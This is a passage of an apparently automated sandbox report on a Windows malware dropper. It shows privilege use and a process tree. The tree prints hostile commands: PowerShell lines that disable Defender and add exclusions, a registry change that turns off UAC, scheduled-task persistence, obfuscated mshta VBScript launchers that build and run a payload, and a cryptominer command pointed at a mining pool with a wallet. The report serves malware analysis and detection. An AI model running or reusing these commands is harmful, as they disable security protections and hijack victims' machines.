SeIncBasePriorityPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeCreatePagefilePrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeCreatePermanentPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeBackupPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeRestorePrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeShutdownPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeDebugPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeAuditPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeSystemEnvironmentPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeChangeNotifyPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeRemoteShutdownPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeUndockPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeSyncAgentPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeEnableDelegationPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeManageVolumePrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeImpersonatePrivilege 4692 Sat01e3b3e0fa80800c.exe Token: SeCreateGlobalPrivilege 4692 Sat01e3b3e0fa80800c.exe Token: 31 4692 Sat01e3b3e0fa80800c.exe Token: 32 4692 Sat01e3b3e0fa80800c.exe Token: 33 4692 Sat01e3b3e0fa80800c.exe Token: 34 4692 Sat01e3b3e0fa80800c.exe Token: 35 4692 Sat01e3b3e0fa80800c.exe Token: SeDebugPrivilege 5092 Sat01b537da2e0af175a.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 2264 powershell.exe Token: SeShutdownPrivilege 4308 svchost.exe Token: SeCreatePagefilePrivilege 4308 svchost.exe Token: SeDebugPrivilege 4936 Sat01c5002407.exe Token: SeCreateTokenPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeAssignPrimaryTokenPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeLockMemoryPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeIncreaseQuotaPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeMachineAccountPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeTcbPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeSecurityPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeTakeOwnershipPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeLoadDriverPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeSystemProfilePrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeSystemtimePrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeProfSingleProcessPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeIncBasePriorityPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeCreatePagefilePrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeCreatePermanentPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeBackupPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeRestorePrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe Token: SeShutdownPrivilege 5700 nYM_HzkzBazNv3s7A45da1FV.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
mshta.exemsedge.exeCalculator.exepid process 3088 mshta.exe 7388 msedge.exe 4176 Calculator.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3196 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1648 wrote to memory of 4344 1648 setup_x86_x64_install.exe setup_installer.exe PID 1648 wrote to memory of 4344 1648 setup_x86_x64_install.exe setup_installer.exe PID 1648 wrote to memory of 4344 1648 setup_x86_x64_install.exe setup_installer.exe PID 4344 wrote to memory of 1436 4344 setup_installer.exe setup_install.exe PID 4344 wrote to memory of 1436 4344 setup_installer.exe setup_install.exe PID 4344 wrote to memory of 1436 4344 setup_installer.exe setup_install.exe PID 1436 wrote to memory of 2148 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 2148 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 2148 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 444 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 444 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 444 1436 setup_install.exe cmd.exe PID 444 wrote to memory of 2664 444 cmd.exe powershell.exe PID 444 wrote to memory of 2664 444 cmd.exe powershell.exe PID 444 wrote to memory of 2664 444 cmd.exe powershell.exe PID 2148 wrote to memory of 2264 2148 cmd.exe powershell.exe PID 2148 wrote to memory of 2264 2148 cmd.exe powershell.exe PID 2148 wrote to memory of 2264 2148 cmd.exe powershell.exe PID 1436 wrote to memory of 5000 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 5000 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 5000 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 3340 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 3340 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 3340 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4040 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4040 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4040 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4832 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4832 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4832 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 2824 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 2824 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 2824 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 3412 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 3412 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 3412 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 3988 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 3988 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 3988 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4208 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4208 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4208 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4376 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4376 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4376 1436 setup_install.exe cmd.exe PID 4040 wrote to memory of 5092 4040 cmd.exe Sat01b537da2e0af175a.exe PID 4040 wrote to memory of 5092 4040 cmd.exe Sat01b537da2e0af175a.exe PID 1436 wrote to memory of 5056 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 5056 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 5056 1436 setup_install.exe cmd.exe PID 3340 wrote to memory of 3160 3340 cmd.exe Sat01866e4ba0024d.exe PID 3340 wrote to memory of 3160 3340 cmd.exe Sat01866e4ba0024d.exe PID 3340 wrote to memory of 3160 3340 cmd.exe Sat01866e4ba0024d.exe PID 2824 wrote to memory of 4872 2824 cmd.exe Sat0188dba58af938.exe PID 2824 wrote to memory of 4872 2824 cmd.exe Sat0188dba58af938.exe PID 2824 wrote to memory of 4872 2824 cmd.exe Sat0188dba58af938.exe PID 5000 wrote to memory of 3788 5000 cmd.exe Sat016e74da9cbf1.exe PID 5000 wrote to memory of 3788 5000 cmd.exe Sat016e74da9cbf1.exe PID 5000 wrote to memory of 3788 5000 cmd.exe Sat016e74da9cbf1.exe PID 1436 wrote to memory of 1968 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 1968 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 1968 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4828 1436 setup_install.exe cmd.exe PID 1436 wrote to memory of 4828 1436 setup_install.exe cmd.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
569C.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 569C.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat016e74da9cbf1.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat016e74da9cbf1.exeSat016e74da9cbf1.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\e5H4avJGAknZvvCppg0GFVNM.exe"C:\Users\Admin\Pictures\Adobe Films\e5H4avJGAknZvvCppg0GFVNM.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\6ltbOXKT_ifPZ3wV_9gaAgR_.exe"C:\Users\Admin\Pictures\Adobe Films\6ltbOXKT_ifPZ3wV_9gaAgR_.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\o9uSZntIwqe93u3YXgjwODAp.exe"C:\Users\Admin\Pictures\Adobe Films\o9uSZntIwqe93u3YXgjwODAp.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\X4IAaOgGcZikswnm7TOgIOSW.exe"C:\Users\Admin\Documents\X4IAaOgGcZikswnm7TOgIOSW.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\nYM_HzkzBazNv3s7A45da1FV.exe"C:\Users\Admin\Pictures\Adobe Films\nYM_HzkzBazNv3s7A45da1FV.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\zYdlxzTOubkxt6qsS_obRu5x.exe"C:\Users\Admin\Pictures\Adobe Films\zYdlxzTOubkxt6qsS_obRu5x.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8048 -s 23610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\28Fes2YSzGb2vczE9pkmn4AA.exe"C:\Users\Admin\Pictures\Adobe Films\28Fes2YSzGb2vczE9pkmn4AA.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8024 -s 24010⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe"C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\4WqjhvnE_nWs2qhNwdMkZgn0.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "4WqjhvnE_nWs2qhNwdMkZgn0.exe"12⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\ct7RBygn1rP1ckYHc9QoXLS3.exe"C:\Users\Admin\Pictures\Adobe Films\ct7RBygn1rP1ckYHc9QoXLS3.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\11Uka6VhuG8aNccyUNPMKjhJ.exe"C:\Users\Admin\Pictures\Adobe Films\11Uka6VhuG8aNccyUNPMKjhJ.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\shgBWCefQthWMZ9bzKCaG8Jr.exe"C:\Users\Admin\Pictures\Adobe Films\shgBWCefQthWMZ9bzKCaG8Jr.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x208,0x20c,0x210,0x1e4,0x214,0x7ff86290dec0,0x7ff86290ded0,0x7ff86290dee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7baac9e70,0x7ff7baac9e80,0x7ff7baac9e9013⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,5350433864775299725,6792876898391423959,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1500_1764078621" --mojo-platform-channel-handle=1768 /prefetch:812⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1704,5350433864775299725,6792876898391423959,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1500_1764078621" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1720 /prefetch:212⤵
-
C:\Users\Admin\Pictures\Adobe Films\hbmssEj0o1Sjtg9efIzhu9Cj.exe"C:\Users\Admin\Pictures\Adobe Films\hbmssEj0o1Sjtg9efIzhu9Cj.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UR4VL.tmp\hbmssEj0o1Sjtg9efIzhu9Cj.tmp"C:\Users\Admin\AppData\Local\Temp\is-UR4VL.tmp\hbmssEj0o1Sjtg9efIzhu9Cj.tmp" /SL5="$7024E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\hbmssEj0o1Sjtg9efIzhu9Cj.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\Vgb9MSUHJnGgHNOrMsbi_BKX.exe"C:\Users\Admin\Pictures\Adobe Films\Vgb9MSUHJnGgHNOrMsbi_BKX.exe"7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\LF6wUUS4Bh5t4GsH_50X1G6X.exe"C:\Users\Admin\Pictures\Adobe Films\LF6wUUS4Bh5t4GsH_50X1G6X.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\FOGl6ElFqFbTpkovg9hhVPi3.exe"C:\Users\Admin\Pictures\Adobe Films\FOGl6ElFqFbTpkovg9hhVPi3.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 2008⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\Vnbdvi08mAvQMZ57cLQirs_r.exe"C:\Users\Admin\Pictures\Adobe Films\Vnbdvi08mAvQMZ57cLQirs_r.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01866e4ba0024d.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01866e4ba0024d.exeSat01866e4ba0024d.exe /mixone6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01b537da2e0af175a.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01b537da2e0af175a.exeSat01b537da2e0af175a.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\A7nrtit\helpydn.exe"C:\Program Files (x86)\A7nrtit\helpydn.exe"14⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4028317.exe"C:\Users\Admin\AppData\Roaming\4028317.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\4921466.exe"C:\Users\Admin\AppData\Roaming\4921466.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\8999824.exe"C:\Users\Admin\AppData\Roaming\8999824.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\1775299.exe"C:\Users\Admin\AppData\Roaming\1775299.exe"9⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\8696436.exe"C:\Users\Admin\AppData\Roaming\8696436.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ("C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\Users\Admin\AppData\Roaming\8696436.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If """" == """" for %d in ( ""C:\Users\Admin\AppData\Roaming\8696436.exe"") do taskkill /im ""%~nXd"" -F " ,0 , TrUe))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\Users\Admin\AppData\Roaming\8696436.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If "" =="" for %d in ("C:\Users\Admin\AppData\Roaming\8696436.exe") do taskkill /im "%~nXd" -F11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "8696436.exe" -F12⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 2929⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵
-
